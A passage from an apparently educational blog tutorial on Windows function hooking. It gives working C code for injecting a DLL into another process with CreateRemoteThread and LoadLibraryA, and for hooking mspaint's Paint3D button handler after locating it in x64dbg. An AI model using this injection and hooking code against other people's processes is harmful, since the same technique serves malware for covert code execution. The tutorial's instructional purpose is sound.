<span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Could not allocate %zd bytes in process with pid: %lu</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">dllPathLen</span><span class="p">,</span> <span class="n">processID</span><span class="p">);</span>
<span class="k">return</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">BOOL</span> <span class="n">writeSucceeded</span> <span class="o">=</span> <span class="n">WriteProcessMemory</span><span class="p">(</span>
<span class="n">handle</span><span class="p">,</span>
<span class="n">dllPathRemote</span><span class="p">,</span>
<span class="n">dllPath</span><span class="p">,</span>
<span class="n">dllPathLen</span><span class="p">,</span>
<span class="nb">NULL</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">writeSucceeded</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Could not write %zd bytes to process with pid %lu</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">dllPathLen</span><span class="p">,</span> <span class="n">processID</span><span class="p">);</span>
<span class="k">return</span><span class="p">;</span>
<span class="p">}</span>
<span class="c1">//now get address of LoadLibraryA function inside Kernel32.dll</span>
<span class="c1">//TEXT macro "Identifies a string as Unicode when UNICODE is defined by a preprocessor directive during compilation. Otherwise, ANSI string"</span>
<span class="n">PTHREAD_START_ROUTINE</span> <span class="n">loadLibraryFunc</span> <span class="o">=</span> <span class="p">(</span><span class="n">PTHREAD_START_ROUTINE</span><span class="p">)</span><span class="n">GetProcAddress</span><span class="p">(</span><span class="n">GetModuleHandle</span><span class="p">(</span><span class="n">TEXT</span><span class="p">(</span><span class="s">"Kernel32.dll"</span><span class="p">)),</span> <span class="s">"LoadLibraryA"</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">loadLibraryFunc</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Could not find LoadLibraryA function inside kernel32.dll</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="k">return</span><span class="p">;</span>
<span class="p">}</span>
<span class="c1">//now create a thread in remote process that loads our target dll using LoadLibraryA</span>
<span class="n">HANDLE</span> <span class="n">remoteThread</span> <span class="o">=</span> <span class="n">CreateRemoteThread</span><span class="p">(</span>
<span class="n">handle</span><span class="p">,</span>
<span class="nb">NULL</span><span class="p">,</span> <span class="c1">//default thread security</span>
<span class="mi">0</span><span class="p">,</span> <span class="c1">//stack size for thread</span>
<span class="n">loadLibraryFunc</span><span class="p">,</span> <span class="c1">//pointer to start of thread function (for us, LoadLibraryA)</span>
<span class="n">dllPathRemote</span><span class="p">,</span> <span class="c1">//pointer to variable being passed to thread function</span>
<span class="mi">0</span><span class="p">,</span> <span class="c1">//0 means the thread runs immediately after creation</span>
<span class="nb">NULL</span><span class="p">);</span> <span class="c1">//we don't care about getting back the thread identifier</span>
<span class="k">if</span> <span class="p">(</span><span class="n">remoteThread</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Could not create remote thread.</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="k">return</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">else</span>
<span class="p">{</span>
<span class="n">fprintf</span><span class="p">(</span><span class="n">stdout</span><span class="p">,</span> <span class="s">"Success! remote thread started in process %lu</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">processID</span><span class="p">);</span>
<span class="p">}</span>
<span class="c1">// Wait for the remote thread to terminate</span>
<span class="n">WaitForSingleObject</span><span class="p">(</span><span class="n">remoteThread</span><span class="p">,</span> <span class="n">INFINITE</span><span class="p">);</span>
<span class="c1">//once we're done, free the memory we allocated in the remote process for the dllPathname, and shut down</span>
<span class="n">VirtualFreeEx</span><span class="p">(</span><span class="n">handle</span><span class="p">,</span> <span class="n">dllPathRemote</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">MEM_RELEASE</span><span class="p">);</span>
<span class="n">CloseHandle</span><span class="p">(</span><span class="n">remoteThread</span><span class="p">);</span>
<span class="n">CloseHandle</span><span class="p">(</span><span class="n">handle</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">DWORD</span> <span class="nf">findPidByName</span><span class="p">(</span><span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">name</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">HANDLE</span> <span class="n">h</span><span class="p">;</span>
<span class="n">PROCESSENTRY32</span> <span class="n">singleProcess</span><span class="p">;</span>
<span class="n">h</span> <span class="o">=</span> <span class="n">CreateToolhelp32Snapshot</span><span class="p">(</span> <span class="c1">//takes a snapshot of specified processes</span>
<span class="n">TH32CS_SNAPPROCESS</span><span class="p">,</span> <span class="c1">//get all processes</span>
<span class="mi">0</span><span class="p">);</span> <span class="c1">//ignored for SNAPPROCESS</span>
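<span class="n">singleProcess</span><span class="p">.</span><span class="n">dwSize</span> <span class="o">=</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">PROCESSENTRY32</span><span class="p">);</span>
<span class="c1">//Process32First fills in the first entry, otherwise the loop below would start by comparing uninitialized memory</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">Process32First</span><span class="p">(</span><span class="n">h</span><span class="p">,</span> <span class="o">&</span><span class="n">singleProcess</span><span class="p">))</span>
<span class="p">{</span>
<span class="n">CloseHandle</span><span class="p">(</span><span class="n">h</span><span class="p">);</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>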
<span class="k">do</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">strcmp</span><span class="p">(</span><span class="n">singleProcess</span><span class="p">.</span><span class="n">szExeFile</span><span class="p">,</span> <span class="n">name</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">DWORD</span> <span class="n">pid</span> <span class="o">=</span> <span class="n">singleProcess</span><span class="p">.</span><span class="n">th32ProcessID</span><span class="p">;</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"PID Found: %lu</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">pid</span><span class="p">);</span>
<span class="n">CloseHandle</span><span class="p">(</span><span class="n">h</span><span class="p">);</span>
<span class="k">return</span> <span class="n">pid</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span> <span class="k">while</span> <span class="p">(</span><span class="n">Process32Next</span><span class="p">(</span><span class="n">h</span><span class="p">,</span> <span class="o">&</span><span class="n">singleProcess</span><span class="p">));</span>
<span class="n">CloseHandle</span><span class="p">(</span><span class="n">h</span><span class="p">);</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span><span class="o">**</span> <span class="n">argv</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">argc</span> <span class="o">!=</span> <span class="mi">3</span><span class="p">)</span>
<span class="p">{</span>
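<span class="n">printHelp</span><span class="p">();</span>
<span class="k">return</span> <span class="mi">1</span><span class="p">;</span> <span class="c1">//bail out instead of reading argv entries that don't exist</span>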
<span class="p">}</span>
<span class="n">createRemoteThread</span><span class="p">(</span><span class="n">findPidByName</span><span class="p">(</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]),</span> <span class="n">argv</span><span class="p">[</span><span class="mi">2</span><span class="p">]);</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
</details></div>
<p>The code for the dll we’re going to inject is basically identical to the last example except that main() will be replaced by DllMain(), and we need to do some extra work to get a pointer to the function we want to hook. With those concerns in mind, the skeleton of Example 2’s dll looks like this:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="c1">//source for a hooking dll that will be injected into mspaint.exe</span>
<span class="cp">#include <Windows.h>
#include <stdint.h>
#include <Psapi.h>
</span>
<span class="kt">void</span><span class="o">*</span> <span class="nf">AllocatePageNearAddress</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span> <span class="n">targetAddr</span><span class="p">)</span>
<span class="p">{</span>
<span class="c1">//same as before</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">WriteAbsoluteJump64</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span> <span class="n">absJumpMemory</span><span class="p">,</span> <span class="kt">void</span><span class="o">*</span> <span class="n">addrToJumpTo</span><span class="p">)</span>
<span class="p">{</span>
<span class="c1">//same as before</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">InstallHook</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span> <span class="n">func2hook</span><span class="p">,</span> <span class="kt">void</span><span class="o">*</span> <span class="n">payloadFunction</span><span class="p">)</span>
<span class="p">{</span>
<span class="c1">//same as before</span>
<span class="p">}</span>
<span class="n">BOOL</span> <span class="n">WINAPI</span> <span class="nf">DllMain</span><span class="p">(</span><span class="n">HINSTANCE</span> <span class="n">hinstDLL</span><span class="p">,</span> <span class="n">DWORD</span> <span class="n">ul_reason_for_call</span><span class="p">,</span> <span class="n">LPVOID</span> <span class="n">lpvReserved</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">ul_reason_for_call</span> <span class="o">==</span> <span class="n">DLL_PROCESS_ATTACH</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">InstallHook</span><span class="p">(</span><span class="mh">0x0</span><span class="p">,</span> <span class="mh">0x0</span><span class="p">);</span> <span class="c1">//we'll fill this in later</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nb">true</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<h3 id="what-function-do-we-need-to-hook">What Function Do We Need to Hook?</h3>
<p>Since our goal is to disable the “Edit With Paint3D” button, we need to find the mspaint.exe function that handles that button press. We know that the “Edit With Paint3D” button eventually launches a Paint3D process, so we can be reasonably sure that a function like CreateProcessA() or OpenProcess() gets called at some point during the button handling function. Blindly hooking either of these functions and redirecting them to an empty function doesn’t work (I tried), but throwing some breakpoints on them is as good a place to start as any.</p>
<p>If we look at the functions imported by mspaint in a debugger (like <a href="https://x64dbg.com">x64dbg</a>), we can see that it is in fact importing OpenProcess(), so our first step is to throw a breakpoint there and then see what happens when we press the Paint3D button.</p>
<div align="center">
<img src="/images/post_images/2020-11-13/reverse_step1.PNG" />
<br /><br />
</div>
<p>It turns out that our breakpoint <em>does</em> get hit in response to the button click, which is fantastic. If we switch over to the callstack view while we’re stopped at the breakpoint, we can see a couple of mspaint.exe functions much higher up in the stack. The highest of these in the callstack could well be the button handler function we’re after.</p>
<div align="center">
<img src="/images/post_images/2020-11-13/reverse_step2.png" />
<br /><br />
</div>
<p>Going to the address shown for that function brings us into the middle of a function body. What we’re after is the relative virtual address (RVA) of the beginning of this function. x64dbg makes this really easy. All we need to do is scroll up until we find the first instruction for the function, then right click on the address of that instruction and select “Copy->RVA.” In my version of mspaint.exe, the RVA of this function is 0x4AA40.</p>
<p>I’m going to save us some trial and error here and reveal that 0x4AA40 ends up <em>not</em> being the address we need. The real button handler runs on a different thread. Hooking 0x4AA40 and redirecting it to an empty function disables the Paint3D button, but only if the current document is empty.</p>
<p>I wish I had a better procedure to share, but my next step after realizing the above was to retry the same procedure except draw something in paint before I clicked the Paint3D button. The callstack I got then had a number of calls inside uiribbon.dll, and the highest mspaint.exe function in that stack ended up being the button handler. Its RVA was 0x6C6F0.</p>
<h3 id="turning-an-rva-into-a-runtime-memory-address">Turning an RVA Into a Runtime Memory Address</h3>
<p>RVAs are addresses which are relative to the base address of the module they’re located in. Since programs (and individual modules, thanks to ASLR) can be loaded into memory at different locations across multiple runs of the same program, having the RVA of a function means that we can reliably get that function’s address, no matter where the process is loaded in memory.</p>
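<p>As a worked example of that arithmetic, the sketch below adds the same RVA to two different module base addresses. The helper names and both base addresses are invented for illustration; only the RVA 0x6C6F0 comes from the debugging session above.</p>

```c
#include <stdint.h>

// Hypothetical helpers, not part of the example dll.

// An RVA is an offset from the start of a module, so the runtime
// address is just the module's base address plus the RVA.
uint64_t RvaToAddress(uint64_t moduleBase, uint64_t rva)
{
    return moduleBase + rva;
}

// Going the other way: given an address inside a module, subtracting
// the module's base address recovers the RVA.
uint64_t AddressToRva(uint64_t moduleBase, uint64_t address)
{
    return address - moduleBase;
}
```

<p>With a base of 0x7FF6A0000000 the function lands at 0x7FF6A006C6F0, and with a base of 0x7FF7B2340000 it lands at 0x7FF7B23AC6F0. The RVA is the only part that stays the same between runs.</p>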
<p>In this case, our target function is implemented inside the base module of the process (since it isn’t imported from a dll), so we need to find the base address of the mspaint.exe module. We can do this with the function below.</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">uint64_t</span> <span class="nf">GetBaseModuleForProcess</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">HANDLE</span> <span class="n">process</span> <span class="o">=</span> <span class="n">GetCurrentProcess</span><span class="p">();</span>
<span class="n">HMODULE</span> <span class="n">processModules</span><span class="p">[</span><span class="mi">1024</span><span class="p">];</span>
<span class="n">DWORD</span> <span class="n">numBytesWrittenInModuleArray</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">EnumProcessModules</span><span class="p">(</span><span class="n">process</span><span class="p">,</span> <span class="n">processModules</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">HMODULE</span><span class="p">)</span> <span class="o">*</span> <span class="mi">1024</span><span class="p">,</span> <span class="o">&</span><span class="n">numBytesWrittenInModuleArray</span><span class="p">);</span>
<span class="n">DWORD</span> <span class="n">numRemoteModules</span> <span class="o">=</span> <span class="n">numBytesWrittenInModuleArray</span> <span class="o">/</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">HMODULE</span><span class="p">);</span>
<span class="n">CHAR</span> <span class="n">processName</span><span class="p">[</span><span class="mi">256</span><span class="p">];</span>
<span class="n">GetModuleFileNameEx</span><span class="p">(</span><span class="n">process</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="n">processName</span><span class="p">,</span> <span class="mi">256</span><span class="p">);</span> <span class="c1">//a null module handle gets the process name</span>
<span class="n">_strlwr_s</span><span class="p">(</span><span class="n">processName</span><span class="p">,</span> <span class="mi">256</span><span class="p">);</span>
<span class="n">HMODULE</span> <span class="n">module</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="c1">//An HMODULE is the DLL's base address </span>
<span class="k">for</span> <span class="p">(</span><span class="n">DWORD</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">numRemoteModules</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">CHAR</span> <span class="n">moduleName</span><span class="p">[</span><span class="mi">256</span><span class="p">];</span>
<span class="n">CHAR</span> <span class="n">absoluteModuleName</span><span class="p">[</span><span class="mi">256</span><span class="p">];</span>
<span class="n">GetModuleFileNameEx</span><span class="p">(</span><span class="n">process</span><span class="p">,</span> <span class="n">processModules</span><span class="p">[</span><span class="n">i</span><span class="p">],</span> <span class="n">moduleName</span><span class="p">,</span> <span class="mi">256</span><span class="p">);</span>
<span class="n">_fullpath</span><span class="p">(</span><span class="n">absoluteModuleName</span><span class="p">,</span> <span class="n">moduleName</span><span class="p">,</span> <span class="mi">256</span><span class="p">);</span>
<span class="n">_strlwr_s</span><span class="p">(</span><span class="n">absoluteModuleName</span><span class="p">,</span> <span class="mi">256</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">strcmp</span><span class="p">(</span><span class="n">processName</span><span class="p">,</span> <span class="n">absoluteModuleName</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">module</span> <span class="o">=</span> <span class="n">processModules</span><span class="p">[</span><span class="n">i</span><span class="p">];</span>
<span class="k">break</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">return</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">module</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>An HMODULE is actually a pointer to the location of a module in memory, so the cast to a uint64_t in the above example is mostly for convenience. In order to get the address of our target function, we’ll need to add the function’s RVA to this base module address.</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">void</span><span class="o">*</span> <span class="nf">GetFunc2HookAddr</span><span class="p">()</span>
<span class="p">{</span>
<span class="kt">uint64_t</span> <span class="n">functionRVA</span> <span class="o">=</span> <span class="mh">0x6C6F0</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">func2HookAddr</span> <span class="o">=</span> <span class="n">GetBaseModuleForProcess</span><span class="p">()</span> <span class="o">+</span> <span class="n">functionRVA</span><span class="p">;</span>
<span class="k">return</span> <span class="p">(</span><span class="kt">void</span><span class="o">*</span><span class="p">)</span><span class="n">func2HookAddr</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>If we were hooking a function that was imported from a dll, we’d need to modify the GetBaseModuleForProcess() function to let us specify the name of the module that we were after, rather than being hardcoded to find the base. We’ll do this in the fourth example in this post, but you can also see an example of this in the code for my hooking-by-example repo <a href="https://github.com/khalladay/hooking-by-example/blob/64d6eb01bcb253d0f622e5fbae434d344ccf8330/hooking-by-example/hooking_common.h#L182">here</a>.</p>
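<p>One piece of that change is deciding whether an enumerated module path refers to the module we asked for. The helper below is a hypothetical sketch of that comparison (it is not the code from the repo linked above): it ignores the directory portion of the path and compares file names without regard to case, similar in spirit to the lowercasing that GetBaseModuleForProcess() does.</p>

```c
#include <ctype.h>

// Hypothetical helper: returns 1 if the file name at the end of modulePath
// matches moduleName (ignoring case), and 0 otherwise.
int ModulePathMatchesName(const char* modulePath, const char* moduleName)
{
    // skip past the last path separator, if there is one
    const char* fileName = modulePath;
    for (const char* c = modulePath; *c != '\0'; ++c)
    {
        if (*c == '\\' || *c == '/')
        {
            fileName = c + 1;
        }
    }

    // compare the two names one character at a time, ignoring case
    while (*fileName != '\0' && *moduleName != '\0')
    {
        if (tolower((unsigned char)*fileName) != tolower((unsigned char)*moduleName))
        {
            return 0;
        }
        ++fileName;
        ++moduleName;
    }

    // only a match if both strings ended at the same time
    return *fileName == '\0' && *moduleName == '\0';
}
```

<p>Inside the module loop, a call like ModulePathMatchesName(moduleName, "uiribbon.dll") could then stand in for the strcmp() against the process name.</p>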
<h3 id="putting-it-all-together">Putting It All Together</h3>
<p>Now that we have a function to hook, all we need to do is redirect it to an empty payload function to disable it. This is as straightforward as it sounds:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">int</span> <span class="nf">NullPaint3DButtonHandler</span><span class="p">()</span>
<span class="p">{</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">BOOL</span> <span class="n">WINAPI</span> <span class="nf">DllMain</span><span class="p">(</span><span class="n">HINSTANCE</span> <span class="n">hinstDLL</span><span class="p">,</span> <span class="n">DWORD</span> <span class="n">ul_reason_for_call</span><span class="p">,</span> <span class="n">LPVOID</span> <span class="n">lpvReserved</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">ul_reason_for_call</span> <span class="o">==</span> <span class="n">DLL_PROCESS_ATTACH</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">InstallHook</span><span class="p">(</span><span class="n">GetFunc2HookAddr</span><span class="p">(),</span> <span class="n">NullPaint3DButtonHandler</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nb">true</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>We got a bit lucky here because the button handling function doesn’t have a significant return value (or at least, returning 0 from it is valid). The smart way to approach this would probably be to spend some time in the debugger really understanding what this button handling function does, so that we could write a payload that we knew wasn’t going to break anything, but sometimes it’s better to be lucky than smart.</p>
<p>All we need to do to finish things off is add the implementation for GetFunc2HookAddr() and the payload function into our example dll. The end result is a dll that disables the “Edit with Paint3D” button when injected into mspaint, exactly as we planned. The full source for this example is in the collapsible box below.</p>
<div class="collapsewrapper2">
<details class="collapsible">
<summary>Full Code for Example 2 (click to expand)</summary>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="cp">#include <Windows.h>
#include <stdint.h>
#include <Psapi.h>
</span>
<span class="kt">void</span><span class="o">*</span> <span class="nf">AllocatePageNearAddress</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span> <span class="n">targetAddr</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">SYSTEM_INFO</span> <span class="n">sysInfo</span><span class="p">;</span>
<span class="n">GetSystemInfo</span><span class="p">(</span><span class="o">&</span><span class="n">sysInfo</span><span class="p">);</span>
<span class="k">const</span> <span class="kt">uint64_t</span> <span class="n">PAGE_SIZE</span> <span class="o">=</span> <span class="n">sysInfo</span><span class="p">.</span><span class="n">dwPageSize</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">startAddr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">(</span><span class="n">targetAddr</span><span class="p">)</span> <span class="o">&</span> <span class="o">~</span><span class="p">(</span><span class="n">PAGE_SIZE</span> <span class="o">-</span> <span class="mi">1</span><span class="p">));</span> <span class="c1">//round down to nearest page boundary</span>
<span class="kt">uint64_t</span> <span class="n">minAddr</span> <span class="o">=</span> <span class="n">max</span><span class="p">(</span><span class="n">startAddr</span> <span class="o">-</span> <span class="mh">0x7FFFFF00</span><span class="p">,</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">sysInfo</span><span class="p">.</span><span class="n">lpMinimumApplicationAddress</span><span class="p">);</span>
<span class="kt">uint64_t</span> <span class="n">maxAddr</span> <span class="o">=</span> <span class="n">min</span><span class="p">(</span><span class="n">startAddr</span> <span class="o">+</span> <span class="mh">0x7FFFFF00</span><span class="p">,</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">sysInfo</span><span class="p">.</span><span class="n">lpMaximumApplicationAddress</span><span class="p">);</span>
<span class="kt">uint64_t</span> <span class="n">startPage</span> <span class="o">=</span> <span class="p">(</span><span class="n">startAddr</span> <span class="o">-</span> <span class="p">(</span><span class="n">startAddr</span> <span class="o">%</span> <span class="n">PAGE_SIZE</span><span class="p">));</span>
<span class="kt">uint64_t</span> <span class="n">pageOffset</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>
<span class="k">while</span> <span class="p">(</span><span class="mi">1</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">uint64_t</span> <span class="n">byteOffset</span> <span class="o">=</span> <span class="n">pageOffset</span> <span class="o">*</span> <span class="n">PAGE_SIZE</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">highAddr</span> <span class="o">=</span> <span class="n">startPage</span> <span class="o">+</span> <span class="n">byteOffset</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">lowAddr</span> <span class="o">=</span> <span class="p">(</span><span class="n">startPage</span> <span class="o">></span> <span class="n">byteOffset</span><span class="p">)</span> <span class="o">?</span> <span class="n">startPage</span> <span class="o">-</span> <span class="n">byteOffset</span> <span class="o">:</span> <span class="mi">0</span><span class="p">;</span>
<span class="kt">bool</span> <span class="n">needsExit</span> <span class="o">=</span> <span class="n">highAddr</span> <span class="o">></span> <span class="n">maxAddr</span> <span class="o">&&</span> <span class="n">lowAddr</span> <span class="o"><</span> <span class="n">minAddr</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">highAddr</span> <span class="o"><</span> <span class="n">maxAddr</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">void</span><span class="o">*</span> <span class="n">outAddr</span> <span class="o">=</span> <span class="n">VirtualAlloc</span><span class="p">((</span><span class="kt">void</span><span class="o">*</span><span class="p">)</span><span class="n">highAddr</span><span class="p">,</span> <span class="n">PAGE_SIZE</span><span class="p">,</span> <span class="n">MEM_COMMIT</span> <span class="o">|</span> <span class="n">MEM_RESERVE</span><span class="p">,</span> <span class="n">PAGE_EXECUTE_READWRITE</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">outAddr</span><span class="p">)</span>
<span class="k">return</span> <span class="n">outAddr</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="n">lowAddr</span> <span class="o">></span> <span class="n">minAddr</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">void</span><span class="o">*</span> <span class="n">outAddr</span> <span class="o">=</span> <span class="n">VirtualAlloc</span><span class="p">((</span><span class="kt">void</span><span class="o">*</span><span class="p">)</span><span class="n">lowAddr</span><span class="p">,</span> <span class="n">PAGE_SIZE</span><span class="p">,</span> <span class="n">MEM_COMMIT</span> <span class="o">|</span> <span class="n">MEM_RESERVE</span><span class="p">,</span> <span class="n">PAGE_EXECUTE_READWRITE</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">outAddr</span> <span class="o">!=</span> <span class="nb">nullptr</span><span class="p">)</span>
<span class="k">return</span> <span class="n">outAddr</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">pageOffset</span><span class="o">++</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">needsExit</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">break</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nb">nullptr</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">uint64_t</span> <span class="nf">GetBaseModuleForProcess</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">HANDLE</span> <span class="n">process</span> <span class="o">=</span> <span class="n">GetCurrentProcess</span><span class="p">();</span>
<span class="n">HMODULE</span> <span class="n">processModules</span><span class="p">[</span><span class="mi">1024</span><span class="p">];</span>
<span class="n">DWORD</span> <span class="n">numBytesWrittenInModuleArray</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">EnumProcessModules</span><span class="p">(</span><span class="n">process</span><span class="p">,</span> <span class="n">processModules</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">HMODULE</span><span class="p">)</span> <span class="o">*</span> <span class="mi">1024</span><span class="p">,</span> <span class="o">&</span><span class="n">numBytesWrittenInModuleArray</span><span class="p">);</span>
<span class="n">DWORD</span> <span class="n">numRemoteModules</span> <span class="o">=</span> <span class="n">numBytesWrittenInModuleArray</span> <span class="o">/</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">HMODULE</span><span class="p">);</span>
<span class="n">CHAR</span> <span class="n">processName</span><span class="p">[</span><span class="mi">256</span><span class="p">];</span>
<span class="n">GetModuleFileNameEx</span><span class="p">(</span><span class="n">process</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="n">processName</span><span class="p">,</span> <span class="mi">256</span><span class="p">);</span> <span class="c1">//a null module handle gets the process name</span>
<span class="n">_strlwr_s</span><span class="p">(</span><span class="n">processName</span><span class="p">,</span> <span class="mi">256</span><span class="p">);</span>
<span class="n">HMODULE</span> <span class="n">module</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="c1">//An HMODULE is the DLL's base address </span>
<span class="k">for</span> <span class="p">(</span><span class="n">DWORD</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">numRemoteModules</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">CHAR</span> <span class="n">moduleName</span><span class="p">[</span><span class="mi">256</span><span class="p">];</span>
<span class="n">CHAR</span> <span class="n">absoluteModuleName</span><span class="p">[</span><span class="mi">256</span><span class="p">];</span>
<span class="n">GetModuleFileNameEx</span><span class="p">(</span><span class="n">process</span><span class="p">,</span> <span class="n">processModules</span><span class="p">[</span><span class="n">i</span><span class="p">],</span> <span class="n">moduleName</span><span class="p">,</span> <span class="mi">256</span><span class="p">);</span>
<span class="n">_fullpath</span><span class="p">(</span><span class="n">absoluteModuleName</span><span class="p">,</span> <span class="n">moduleName</span><span class="p">,</span> <span class="mi">256</span><span class="p">);</span>
<span class="n">_strlwr_s</span><span class="p">(</span><span class="n">absoluteModuleName</span><span class="p">,</span> <span class="mi">256</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">strcmp</span><span class="p">(</span><span class="n">processName</span><span class="p">,</span> <span class="n">absoluteModuleName</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">module</span> <span class="o">=</span> <span class="n">processModules</span><span class="p">[</span><span class="n">i</span><span class="p">];</span>
<span class="k">break</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">return</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">module</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">WriteAbsoluteJump64</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span> <span class="n">absJumpMemory</span><span class="p">,</span> <span class="kt">void</span><span class="o">*</span> <span class="n">addrToJumpTo</span><span class="p">)</span>
<span class="p">{</span>
